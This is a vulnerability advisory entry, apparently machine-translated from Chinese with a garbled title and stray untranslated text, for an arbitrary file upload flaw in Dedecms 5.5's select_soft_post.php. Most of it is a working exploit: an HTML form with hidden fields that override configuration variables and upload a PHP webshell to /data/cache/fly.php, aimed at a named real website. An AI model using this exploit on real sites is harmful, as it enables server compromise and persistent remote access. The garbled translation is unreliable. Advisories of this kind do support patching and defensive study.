Woven dream select_soft_post. php page the variables are not the initial vulnerability-vulnerability warning-the black bar safety net

ID MYHACK58:62200925143
Type myhack58
Reporter 佚名
Modified 2009-10-28T00:00:00


Affected version: Dedecms 5.5

Vulnerability description: 漏洞 产生 文件 位于 include\dialog\select_soft_post.php, which is the variable$cfg_basedir not initialized properly, can lead to bypass authentication and system variable initialization file, cause you can upload any file to the specified directory. It exploits the premise is register_globals=on,you can customize the form for the relevant variable assignment.

Test code:

<html> <head> <title>Dedecms v55 RCE Exploit Codz By flyh4t</title> </head> <body xxxxx="FONT-SIZE: 9pt"> ---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br /> <form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'> <input type='hidden' name='activepath' value='/data/cache/' /> <input type='hidden' name='cfg_basedir' value='../../' /> <input type='hidden' name='cfg_imgtype' value='php' /> <input type='hidden' name='cfg_not_allowall' value='txt' /> <input type='hidden' name='cfg_softtype' value='php' /> <input type='hidden' name='cfg_mediatype' value='php' /> <input type='hidden' name='f' value='form1. enclosure' /> <input type='hidden' name='job' value='upload' /> <input type='hidden' name='newname' value='fly.php' /> Select U Shell <input type='file' name='uploadfile' size='2 5' /> <input type='submit' name='sb1' value='OK' /> </form> <br />It's just a exp for the bug of Dedecms V55...<br /> Need register_globals = on...<br /> Fun the game,get a webshell at /data/cache/fly. php...<br /> </body> </html> SEBUG Safety recommendations: No Please pay attention to the official patch!